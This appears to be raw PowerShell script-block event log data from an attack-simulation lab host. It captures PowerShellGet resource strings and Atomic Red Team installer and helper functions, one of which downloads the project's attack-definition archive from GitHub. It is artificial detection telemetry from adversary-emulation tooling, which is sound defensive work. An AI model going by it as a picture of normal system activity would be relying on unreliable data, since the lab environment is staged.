SpecifiedLocationAndOGP=The specified Location is '{0}' and PackageManagementProvider is '{1}'.
NoSourceNameIsSpecified=The -Repository parameter was not specified.  PowerShellGet will use all of the registered repositories.
GettingPackageManagementProviderObject=Getting the provider object for the PackageManagement Provider '{0}'.
InvalidInputObjectValue=Invalid value is specified for InputObject parameter.
SpecifiedInstallationScope=The installation scope is specified to be '{0}'.
SourceLocationValueForPSGalleryCannotBeChanged=The SourceLocation value for the PSGallery repository can not be changed.
PublishLocationValueForPSGalleryCannotBeChanged=The PublishLocation value for the PSGallery repository can not be changed.
SpecifiedProviderName=The specified PackageManagement provider name '{0}'.
ProviderNameNotSpecified=User did not specify the PackageManagement provider name, trying with the provider name '{0}'.
SpecifiedProviderNotAvailable=The specified PackageManagement provider '{0}' is not available.
SpecifiedProviderDoesnotSupportPSModules=The specified PackageManagement Provider '{0}' does not support PowerShell Modules. PackageManagement Providers must support the 'supports-powershell-modules' feature.
PollingPackageManagementProvidersForLocation=Polling available PackageManagement Providers to find one that can support the specified source location '{0}'.
PollingSingleProviderForLocation=Resolving the source location '{0}' with PackageManagement Provider '{1}'.
FoundProviderForLocation=The PackageManagement provider '{0}' supports the source location '{1}'.
SpecifiedLocationCannotBeRegistered=The specified location '{0}' cannot be registered.
RepositoryDetails=Repository details, Name = '{0}', Location = '{1}'; IsTrusted = '{2}'; IsRegistered = '{3}'.
NotSupportedPowerShellGetFormatVersion=The specified module '{0}' with PowerShellGetFormatVersion '{1}' is not supported by the current version of PowerShellGet. Get the latest version of the PowerShellGet module to install this module, '{2}'.
NotSupportedPowerShellGetFormatVersionScripts=The specified script '{0}' with PowerShellGetFormatVersion '{1}' is not supported by the current version of PowerShellGet. Get the latest version of the PowerShellGet module to install this script, '{2}'.
PathNotFound=Cannot find the path '{0}' because it does not exist.
ModuleIsNotTrusted=Untrusted module '{0}'.
ScriptIsNotTrusted=Untrusted script '{0}'.
SkippedModuleDependency=Because dependent module '{0}' was skipped in the module dependencies list, users might not know how to install it.
MissingExternallyManagedModuleDependency=The externally managed, dependent module '{0}' is not installed on this computer. To use the current module '{1}', ensure that its dependent module '{2}' is installed.
ExternallyManagedModuleDependencyIsInstalled=The externally managed, dependent module '{0}' is already installed on this computer.
ScriptMissingExternallyManagedModuleDependency=The externally managed, dependent module '{0}' is not installed on this computer. To use the current script '{1}', ensure that its dependent module '{2}' is installed.
ScriptMissingExternallyManagedScriptDependency=The externally managed, dependent module '{0}' is not installed on this computer. To use the current script '{1}', ensure that its dependent script '{2}' is installed.
ScriptExternallyManagedScriptDependencyIsInstalled=The externally managed, dependent script '{0}' is already installed on this computer.
UnableToResolveModuleDependency=PowerShellGet cannot resolve the module dependency '{0}' of the module '{1}' on the repository '{2}'. Verify that the dependent module '{3}' is available in the repository '{4}'. If this dependent module '{5}' is managed externally, add it to the ExternalModuleDependencies entry in the PSData section of the module manifest.
FindingModuleDependencies=Finding module dependencies for version '{1}' of the module '{0}' from repository '{2}'.
InstallingDependencyModule=Installing the dependency module '{0}' with version '{1}' for the module '{2}'.
InstallingDependencyScript=Installing the dependency script '{0}' with version '{1}' for the script '{2}'.
SavingDependencyModule=Saving the dependency module '{0}' with version '{1}' for the module '{2}'.
SavingDependencyScript=Saving the dependency script '{0}' with version '{1}' for the script '{2}'.
ModuleUninstallationSucceeded=Successfully uninstalled the module '{0}' from module base '{1}'.
ScriptUninstallationSucceeded=Successfully uninstalled the script '{0}' from script base '{1}'.
AdminPrivilegesRequiredForUninstall=You cannot uninstall the module '{0}' from '{1}' because Administrator rights are required to uninstall from that folder. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
AdminPrivilegesRequiredForScriptUninstall=You cannot uninstall the script '{0}' from '{1}' because Administrator rights are required to uninstall from that folder. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
ModuleUninstallationNotPossibleAsItIsNotInstalledUsingPowerShellGet=Module '{0}' was not installed on this computer by using either the PowerShellGet cmdlets or the PowerShellGet provider, so it cannot be uninstalled.
ScriptUninstallationNotPossibleAsItIsNotInstalledUsingPowerShellGet=Script '{0}' was not installed on this computer by using either the PowerShellGet cmdlets or the PowerShellGet provider, so it cannot be uninstalled.
UnableToUninstallModuleVersion=The module '{0}' of version '{1}' in module base folder '{2}' was installed without side-by-side version support. Some versions are installed in this module base with side-by-side version support. Uninstall other versions of this module before uninstalling the most current version.
UnableToUninstallAsOtherModulesNeedThisModule=The module '{0}' of version '{1}' in module base folder '{2}' cannot be uninstalled, because one or more other modules '{3}' are dependent on this module. Uninstall the modules that depend on this module before uninstalling module '{4}'.
UnableToUninstallAsOtherScriptsNeedThisScript=The script '{0}' of version '{1}' in script base folder '{2}' cannot be uninstalled, because one or more other scripts '{3}' are dependent on this script. Uninstall the scripts that depend on this script before uninstalling script '{4}'.
RepositoryIsNotTrusted=Untrusted repository
QueryInstallUntrustedPackage=You are installing the modules from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to install the modules from '{1}'?
QueryInstallUntrustedScriptPackage=You are installing the scripts from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to install the scripts from '{1}'?
QuerySaveUntrustedPackage=You are downloading the modules from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to download the modules from '{1}'?
QuerySaveUntrustedScriptPackage=You are downloading the scripts from an untrusted repository. If you trust this repository, change its InstallationPolicy value by running the Set-PSRepository cmdlet. Are you sure you want to download the scripts from '{1}'?
SourceNotFound=Unable to find repository '{0}'. Use Get-PSRepository to see all available repositories.
PSGalleryApiV2Deprecated=PowerShell Gallery v2 has been deprecated.  Please run 'Update-Module -Name PowerShellGet' to update to PowerShell Gallery v3.  For more information, please visit our website at 'https://www.powershellgallery.com'.
PSGalleryApiV2Discontinued=PowerShell Gallery v2 has been discontinued.  Please run 'Update-Module -Name PowerShellGet' to update to PowerShell Gallery v3.  For more information, please visit our website at 'https://www.powershellgallery.com'.
PowerShellGalleryUnavailable=PowerShell Gallery is currently unavailable.  Please try again later.
PowerShellGetModuleIsNotInstalledProperly=The PowerShellGet module was not installed properly. Be sure that only one instance or version of the PowerShellGet module is installed in the path '{0}'.
PowerShelLGetModuleGotUpdated=The PowerShellGet module was updated successfully. Restart the process to use the updated version of the PowerShellGet module.
TagsShouldBeIncludedInManifestFile=Tags are now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest tag changes. You can run Update-ModuleManifest -Tags to update the manifest with tags.
ReleaseNotesShouldBeIncludedInManifestFile=ReleaseNotes is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest ReleaseNotes changes. You can run Update-ModuleManifest -ReleaseNotes to update the manifest with ReleaseNotes.
LicenseUriShouldBeIncludedInManifestFile=LicenseUri is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' with the newest LicenseUri changes. You can run Update-ModuleManifest -LicenseUri to update the manifest with LicenseUri.
IconUriShouldBeIncludedInManifestFile=IconUri is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest IconUri changes. You can run Update-ModuleManifest -IconUri to update the manifest with IconUri.
ProjectUriShouldBeIncludedInManifestFile=ProjectUri is now supported in the module manifest file (.psd1). Update the module manifest file of module '{0}' in '{1}' with the newest ProjectUri changes. You can run Update-ModuleManifest -ProjectUri to update the manifest with ProjectUri.
ShouldIncludeFunctionsToExport=This module '{0}' has exported functions. As a best practice, include exported functions in the module manifest file(.psd1). You can run Update-ModuleManifest -FunctionsToExport to update the manifest with ExportedFunctions field.
ShouldIncludeCmdletsToExport=This module '{0}' has exported cmdlets. As a best practice, include exported cmdlets in the module manifest file(.psd1). You can run Update-ModuleManifest -CmdletsToExport to update the manifest with ExportedCmdlets field.
ShouldIncludeDscResourcesToExport=This module '{0}' has exported DscResources. As a best practice, include exported DSC resources in the module manifest file(.psd1). If your PowerShell version is higher than 5.0, run Update-ModuleManifest -DscResourcesToExport to update the manifest with ExportedDscResources field.
UpdateModuleManifestPathCannotFound=Cannot load the manifest file '{0}' properly. Please specify the correct manifest path.
UpdatedModuleManifestNotValid=Cannot update the manifest file '{0}' because the manifest is not valid. Verify that the manifest file is valid, and then try again.'{1}'
ExportedDscResourcesNotSupportedOnLowerPowerShellVersion=The ExportedDscResources property is not supported in module manifests on PowerShell versions that are older than 5.0. Remove the value for the parameter ‘DscResourcesToExport’, and then try again.
CompatiblePSEditionsNotSupportedOnLowerPowerShellVersion=The CompatiblePSEditions property is not supported in module manifests on PowerShell versions that are older than 5.1. Remove the value for the parameter ‘CompatiblePSEditions’, and then try again.
ExternalModuleDependenciesNotSpecifiedInRequiredOrNestedModules='{0}' is listed in ExternalModuleDependencies, but it is not found in either the RequiredModules or NestedModules properties. Verify that this module is required for ExternalModuleDependencies, and then add it to NestedModules or RequiredModules.
TestModuleManifestFail=Cannot update the manifest properly. '{0}'
PackageManagementProvidersNotInModuleBaseFolder=PackageManagementProvider '{0}' is not found in the module base '{1}'. Verify that the PackageManagementProvider specified is within the module base.
UpdateManifestContentMessage=Update manifest file with new contents:
InvalidPackageManagementProviderValue=The PackageManagementProvider value cannot be '{0}'. Valid values for provider names include '{1}', and the default value for this parameter is '{2}'.
PowerShellGetUpdateIsNotSupportedOnLowerPSVersions=Self update of the PowerShellGet module is supported only in PowerShell 5.0 and newer releases. It is not supported in PowerShell 3.0 or 4.0.
ScriptVersionShouldBeGreaterThanGalleryVersion=Script '{0}' with version '{1}' cannot be published. The version must exceed the current version '{2}' that exists in the repository '{3}', or you must specify -Force.
ScriptVersionIsAlreadyAvailableInTheGallery=The script '{0}' with version '{1}' cannot be published as the current version '{2}' is already available in the repository '{3}'.
ScriptParseError=The specified script file '{0}' has parse errors, try again after fixing the parse errors.
InvalidScriptToPublish=Script file '{0}' cannot be published because it does not have the required script metadata. Run Update-ScriptFileInfo -Path '{1}' to add the script metadata.
FailedToCreateCompressedScript=Failed to generate the compressed file for script '{0}'.
FailedToPublishScript=Failed to publish script '{0}': '{1}'.
PublishedScriptSuccessfully=Successfully published script '{0

ScriptBlock ID: 6e925164-9e2f-4b72-a634-5bfcdef94594
Path:
06/15/2021 04:59:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467065
Keywords=None
Message=Creating Scriptblock text (1 of 3):
# Localized	03/28/2017 06:00 AM (GMT)	303:4.80.0411 	PSGet.Resource.psd1
#########################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# Localized PSGet.Resource.psd1
#
#########################################################################################

ConvertFrom-StringData @'
###PSLOC
InstallModulewhatIfMessage=Version '{1}' of module '{0}'
InstallScriptwhatIfMessage=Version '{1}' of script '{0}'
UpdateModulewhatIfMessage=Version '__OLDVERSION__' of module '{0}', updating to version '{1}'
UpdateScriptwhatIfMessage=Version '__OLDVERSION__' of script '{0}', updating to version '{1}'
PublishModulewhatIfMessage=Version '{0}' of module '{1}'
PublishScriptwhatIfMessage=Version '{0}' of script '{1}'
NewScriptFileInfowhatIfMessage=Creating the '{0}' PowerShell Script file
UpdateScriptFileInfowhatIfMessage=Updating the '{0}' PowerShell Script file
NameShouldNotContainWildcardCharacters=The specified name '{0}' should not contain any wildcard characters, please correct it and try again.
AllVersionsCannotBeUsedWithOtherVersionParameters=You cannot use the parameter AllVersions with RequiredVersion, MinimumVersion or MaximumVersion in the same command.
VersionRangeAndRequiredVersionCannotBeSpecifiedTogether=You cannot use the parameters RequiredVersion and either MinimumVersion or MaximumVersion in the same command. Specify only one of these parameters in your command.
RequiredVersionAllowedOnlyWithSingleModuleName=The RequiredVersion parameter is allowed only when a single module name is specified as the value of the Name parameter, without any wildcard characters.
MinimumVersionIsGreaterThanMaximumVersion=The specified MinimumVersion '{0}' is greater than the specified MaximumVersion '{1}'.
InstallModuleNeedsCurrentUserScopeParameterForNonAdminUser=Administrator rights are required to install modules in '{0}'. Log on to the computer with an account that has Administrator rights, and then try again, or install '{1}' by adding "-Scope CurrentUser" to your command. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
InstallScriptNeedsCurrentUserScopeParameterForNonAdminUser=Administrator rights are required to install scripts in '{0}'. Log on to the computer with an account that has Administrator rights, and then try again, or install '{1}' by adding "-Scope CurrentUser" to your command. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
VersionParametersAreAllowedOnlyWithSingleName=The RequiredVersion, MinimumVersion, MaximumVersion or AllVersions parameters are allowed only when you specify a single name as the value of the Name parameter, without any wildcard characters.
PathIsNotADirectory=The specified path '{0}' is not a valid directory.
ModuleAlreadyInstalled=Version '{0}' of module '{1}' is already installed at '{2}'. To delete version '{3}' and install version '{4}', run Install-Module, and add the -Force parameter.
ScriptAlreadyInstalled=Version '{0}' of script '{1}' is already installed at '{2}'. To delete version '{3}' and install version '{4}', run Install-Script, and add the -Force parameter.
CommandAlreadyAvailable=A command with name '{0}' is already available on this system. This script '{0}' may override the existing command. If you still want to install this script '{0}', use -Force parameter.
ModuleAlreadyInstalledSxS=Version '{0}' of module '{1}' is already installed at '{2}'. To install version '{3}', run Install-Module and add the -Force parameter, this command will install version '{5}' in side-by-side with version '{4}'.
ModuleAlreadyInstalledVerbose=Version '{0}' of module '{1}' is already installed at '{2}'.
ScriptAlreadyInstalledVerbose=Version '{0}' of script '{1}' is already installed at '{2}'.
ModuleWithRequiredVersionAlreadyInstalled=Version '{0}' of module '{1}' is already installed at '{2}'. To reinstall this version '{3}', run Install-Module or Updated-Module cmdlet with the -Force parameter.
InvalidPSModule=The module '{0}' cannot be installed or updated because it is not a properly-formed module.
InvalidPowerShellScriptFile=The script '{0}' cannot be installed or updated because it is not a properly-formed script.
InvalidAuthenticodeSignature=The module '{0}' cannot be installed or updated because the Authenticode signature for the file '{1}' is not valid.
ModuleNotInstalledOnThisMachine=Module '{0}' was not updated because no valid module was found in the module directory. Verify that the module is located in the folder specified by $env:PSModulePath.
ScriptNotInstalledOnThisMachine=Script '{0}' was not updated because no valid script was found in the script directories '{1}' and '{2}'.
AdminPrivilegesRequiredForUpdate=Module '{0}' (installed at'{1}') cannot be updated because Administrator rights are required to change that directory. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
AdminPrivilegesRequiredForScriptUpdate=Script '{0}' (installed at'{1}') cannot be updated because Administrator rights are required to change that script. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
ModuleNotInstalledUsingPowerShellGet=Module '{0}' was not installed by using Install-Module, so it cannot be updated.
ScriptNotInstalledUsingPowerShellGet=Script '{0}' was not installed by using Install-Script, so it cannot be updated.
DownloadingModuleFromGallery=Downloading module '{0}' with version '{1}' from the repository '{2}'.
DownloadingScriptFromGallery=Downloading script '{0}' with version '{1}' from the repository '{2}'.
NoUpdateAvailable=No updates were found for module '{0}'.
NoScriptUpdateAvailable=No updates were found for module '{0}'.
FoundModuleUpdate=An update for the module '{0}' was found with version '{1}'.
FoundScriptUpdate=An update for the script '{0}' was found with version '{1}'.
InvalidPSModuleDuringUpdate=Module '{0}' was not updated because the module in the repository '{1}' is not a valid Windows PowerShell module.
ModuleGotUpdated=Module '{0}' has been updated successfully.
TestingModuleInUse=Testing if the module to update is in use.
ModuleDestination=The specified module will be installed in '{0}'.
ScriptDestination=The specified script will be installed in '{0}' and its dependent modules will be installed in '{1}'.
ModuleIsInUse=Module '{0}' is in currently in use.
ModuleInstalledSuccessfully=Module '{0}' was installed successfully to path '{1}'.
ModuleSavedSuccessfully=Module '{0}' was saved successfully to path '{1}'.
ScriptInstalledSuccessfully=Script '{0}' was installed successfully to path '{1}'.
ScriptSavedSuccessfully=Script '{0}' was saved successfully to path '{1}'.
CheckingForModuleUpdate=Checking for updates for module '{0}'.
CheckingForScriptUpdate=Checking for updates for script '{0}'.
ModuleInUseWithProcessDetails=The version '{0}' of module '{1}' is currently in use. Retry the operation after closing the following applications: '{2}'.
ModuleVersionInUse=The version '{0}' of module '{1}' is currently in use. Retry the operation after closing the applications.
ModuleNotAvailableLocally=The specified module '{0}' was not published because no module with that name was found in any module directory.
InvalidModulePathToPublish=The specified module with path '{0}' was not published because no valid module was found with that path.
ModuleWithRequiredVersionNotAvailableLocally=The specified module '{0}' with version '{1}' was not published because no module with that name and version was found in any module directory.
AmbiguousModuleName=Modules with the name '{0}' are available under multiple paths. Add the -RequiredVersion parameter or the -Path parameter to specify the module to publish.
AmbiguousModulePath=Multiple versions are available under the specified module path '{0}'. Specify the full path to the module to be published.
PublishModuleLocation=Module '{0}' was found in '{1}'.
InvalidModuleToPublish=Module '{0}' cannot be published because it does not have a module manifest file. Run New-ModuleManifest -Path <PathName> to create a module manifest with metadata before publishing.
MissingRequiredManifestKeys=Module '{0}' cannot be published because it is missing required metadata. Verify that the module manifest specifies Description and Author.
ModuleVersionShouldBeGreaterThanGalleryVersion=Module '{0}' with version '{1}' cannot be published. The version must exceed the current version '{2}' that exists in the repository '{3}', or you must specify -Force.
ModuleVersionIsAlreadyAvailableInTheGallery=The module '{0}' with version '{1}' cannot be published as the current version '{2}' is already available in the repository '{3}'.
CouldNotInstallNuGetProvider=NuGet provider is required to interact with NuGet-based repositories. Please ensure that '{0}' or newer version of NuGet provider is installed.
CouldNotInstallNuGetExe=NuGet.exe is required to interact with NuGet-based repositories. Please ensure that NuGet.exe is available under one of the paths specified in PATH environment variable value.
CouldNotInstallNuGetBinaries2=PowerShellGet requires NuGet.exe and NuGet provider version '{0}' or newer to interact with the NuGet-based repositories. Please ensure that '{0}' or newer version of NuGet provider is installed and NuGet.exe is available under one of the paths specified in PATH environment variable value.
InstallNuGetProviderShouldContinueQuery=PowerShellGet requires NuGet provider version '{0}' or newer to interact with NuGet-based repositories. The NuGet provider must be available in '{1}' or '{2}'. You can also install the NuGet provider by running 'Install-PackageProvider -Name NuGet -MinimumVersion {0} -Force'. Do you want PowerShellGet to install and import the NuGet provider now?
InstallNuGetBinariesShouldContinueQuery2=PowerShellGet requires NuGet.exe and NuGet provider version '{0}' or newer to interact with the NuGet-based repositories. The NuGet provider must be available in '{1}' or '{2}'. You can also install the NuGet provider by running 'Install-PackageProvider -Name NuGet -MinimumVersion {0} -Force'. NuGet.exe must be available in '{3}' or '{4}, or under one of the paths specified in PATH environment variable value. NuGet.exe can be downloaded from http://nuget.org/nuget.exe. Do you want PowerShellGet to install both NuGet.exe and NuGet provider now?
InstallNuGetExeShouldContinueQuery=PowerShellGet requires NuGet.exe to publish an item to the NuGet-based repositories. NuGet.exe must be available in '{0}' or '{1}, or under one of the paths specified in PATH environment variable value. NuGet.exe can be downloaded from http://nuget.org/nuget.exe. Do you want PowerShellGet to install NuGet.exe now?
InstallNuGetBinariesShouldContinueCaption2=NuGet.exe and NuGet provider are required to continue
InstallNuGetProviderShouldContinueCaption=NuGet provider is required to continue
InstallNuGetExeShouldContinueCaption=NuGet.exe is required to continue
DownloadingNugetExe=Installing NuGet.exe.
DownloadingNugetProvider=Installing NuGet provider.
ModuleNotFound=Module '{0}' was not found.
NoMatchFound=No match was found for the specified search criteria and module names '{0}'.
NoMatchFoundForScriptName=No match was found for the specified search criteria and script names '{0}'.
FailedToCreateCompressedModule=Failed to generate the compressed file for module '{0}'.
FailedToPublish=Failed to publish module '{0}': '{1}'.
PublishedSuccessfully=Successfully published module '{0}' to the module publish location '{1}'. Please allow few minutes for '{2}' to show up in the search results.
InvalidWebUri=The specified Uri '{0}' for parameter '{1}' is an invalid Web Uri. Please ensure that it meets the Web Uri requirements.
RepositoryAlreadyRegistered=The repository could not be registered because there exists a registered repository with Name '{0}' and SourceLocation '{1}'. To register another repository with Name '{2}', please unregister the existing repository using the Unregister-PSRepository cmdlet.
RepositoryToBeUnregisteredNotFound=The repository '{0}' was not removed because no repository was found with that name. Please run Get-PSRepository and ensure that a repository of that name is present.
RepositoryCannotBeUnregistered=The specified repository '{0}' cannot be unregistered.
RepositoryNotFound=No repository with the name '{0}' was found.
PSGalleryNotFound=Unable to find repository '{0}'. Use Get-PSRepository to see all available repositories. Try again after specifying a valid repository name. You can use 'Register-PSRepository -Default' to register the PSGallery repository.
ParameterIsNotAllowedWithPSGallery=The PSGallery repository has pre-defined locations. The '{0}' parameter is not allowed, try again after removing the '{0}' parameter.
UseDefaultParameterSetOnRegisterPSRepository=Use 'Register-PSRepository -Default' to register the PSGallery repository.
RepositoryNameContainsWildCards=The repository name '{0}' should not have wildcards, correct it and try again.
InvalidRepository=The specified repository '{0}' is not a valid registered repository name. Please ensure that '{1}' is a registered repository.
RepositoryRegistered=Successfully registered the repository '{0}' with source location '{1}'.
RepositoryUnregistered=Successfully unregistered the repository '{0}'.
PSGalleryPublishLocationIsMissing=The specified repository '{0}' does not have a valid PublishLocation. Retry after setting the PublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
PSRepositoryScriptPublishLocationIsMissing=The specified repository '{0}' does not have a valid ScriptPublishLocation. Retry after setting the ScriptPublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
ScriptSourceLocationIsMissing=The specified repository '{0}' does not have a valid ScriptSourceLocation. Retry after setting the ScriptSourceLocation for repository '{0}' to a valid NuGet endpoint for scripts using the Set-PSRepository cmdlet.
PublishModuleSupportsOnlyNuGetBasedPublishLocations=Publish-Module only supports the NuGet-based publish locations. The PublishLocation '{0}' of the repository '{1}' is not a NuGet-based publish location. Retry after setting the PublishLocation for repository '{1

ScriptBlock ID: 6e925164-9e2f-4b72-a634-5bfcdef94594
Path:
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467226
Keywords=None
Message=Completed invocation of ScriptBlock ID: cafda140-fb82-427b-9d7a-25353affb263
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467225
Keywords=None
Message=Started invocation of ScriptBlock ID: cafda140-fb82-427b-9d7a-25353affb263
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467224
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Install-AtomicsFolder {
  
    <#
    .SYNOPSIS

        This is a simple script to download the atttack definitions in the "atomics" folder of the Red Canary Atomic Red Team project.

        License: MIT License
        Required Dependencies: powershell-yaml
        Optional Dependencies: None

    .PARAMETER DownloadPath

        Specifies the desired path to download atomics zip archive to.

    .PARAMETER InstallPath

        Specifies the desired path for where to unzip the atomics folder.

    .PARAMETER Force

        Delete the existing atomics folder before installation if it exists.

    .EXAMPLE

        Install atomics folder
        PS> Install-AtomicsFolder.ps1

    .NOTES

        Use the '-Verbose' option to print detailed information.

#>
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory = $False, Position = 0)]
        [string]$InstallPath = $( if ($IsLinux -or $IsMacOS) { $Env:HOME + "/AtomicRedTeam" } else { $env:HOMEDRIVE + "\AtomicRedTeam" }),

        [Parameter(Mandatory = $False, Position = 1)]
        [string]$DownloadPath = $InstallPath,

        [Parameter(Mandatory = $False, Position = 2)]
        [string]$RepoOwner = "redcanaryco",

        [Parameter(Mandatory = $False, Position = 3)]
        [string]$Branch = "master",

        [Parameter(Mandatory = $False)]
        [switch]$Force = $False # delete the existing install directory and reinstall
    )
    Try {
        $InstallPathwAtomics = Join-Path $InstallPath "atomics"
        if ($Force -or -Not (Test-Path -Path $InstallPathwAtomics )) {
            write-verbose "Directory Creation"
            if ($Force) {
                Try { 
                    if (Test-Path $InstallPathwAtomics) { Remove-Item -Path $InstallPathwAtomics -Recurse -Force -ErrorAction Stop | Out-Null }
                }
                Catch {
                    Write-Host -ForegroundColor Red $_.Exception.Message
                    return
                }
            }
            if (-not (Test-Path $InstallPath)) { New-Item -ItemType directory -Path $InstallPath | Out-Null }

            $url = "https://github.com/$RepoOwner/atomic-red-team/archive/$Branch.zip"
            $path = Join-Path $DownloadPath "$Branch.zip"
            [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
            write-verbose "Beginning download of atomics folder from Github"
            Invoke-WebRequest $url -OutFile $path

            write-verbose "Extracting ART to $InstallPath"
            $zipDest = Join-Path "$DownloadPath" "tmp"
            expand-archive -LiteralPath $path -DestinationPath "$zipDest" -Force:$Force
            $atomicsFolderUnzipped = Join-Path (Join-Path $zipDest "atomic-red-team-$Branch") "atomics"
            Move-Item $atomicsFolderUnzipped $InstallPath
            Remove-Item $zipDest -Recurse -Force
            Remove-Item $path

        }
        else {
            Write-Host -ForegroundColor Yellow "An atomics folder already exists at $InstallPathwAtomics. No changes were made."
            Write-Host -ForegroundColor Cyan "Try the install again with the '-Force' parameter if you want to delete the existing installion and re-install."
            Write-Host -ForegroundColor Red "Warning: All files within the atomics folder ($InstallPathwAtomics) will be deleted when using the '-Force' parameter."
        }
    }
    Catch {
        Write-Host -ForegroundColor Red "Installation of the AtomicsFolder Failed."
        Write-Host $_.Exception.Message`n
    }
}

ScriptBlock ID: cafda140-fb82-427b-9d7a-25353affb263
Path:
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467223
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6d3e6677-f948-4e19-b867-151cde9a5a60
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467222
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2774a846-5db8-45b9-a46d-ebac9335e82f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467221
Keywords=None
Message=Started invocation of ScriptBlock ID: 2774a846-5db8-45b9-a46d-ebac9335e82f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467220
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Write-PrereqResults ($FailureReasons, $testId) {
    if ($FailureReasons.Count -eq 0) {
        Write-KeyValue "Prerequisites met: " $testId
    }
    else {
        Write-Host -ForegroundColor Red "Prerequisites not met: $testId"
        foreach ($reason in $FailureReasons) {
            Write-Host -ForegroundColor Yellow -NoNewline "`t[*] $reason"
        }
        Write-Host -ForegroundColor Yellow -NoNewline "`nTry installing prereq's with the "
        Write-Host -ForegroundColor Cyan -NoNewline "-GetPrereqs"
        Write-Host -ForegroundColor Yellow  " switch"
    }
}

ScriptBlock ID: 2774a846-5db8-45b9-a46d-ebac9335e82f
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Write-PrereqResults.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467219
Keywords=None
Message=Completed invocation of ScriptBlock ID: bff28245-7378-4201-af85-7adcd845ae7d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
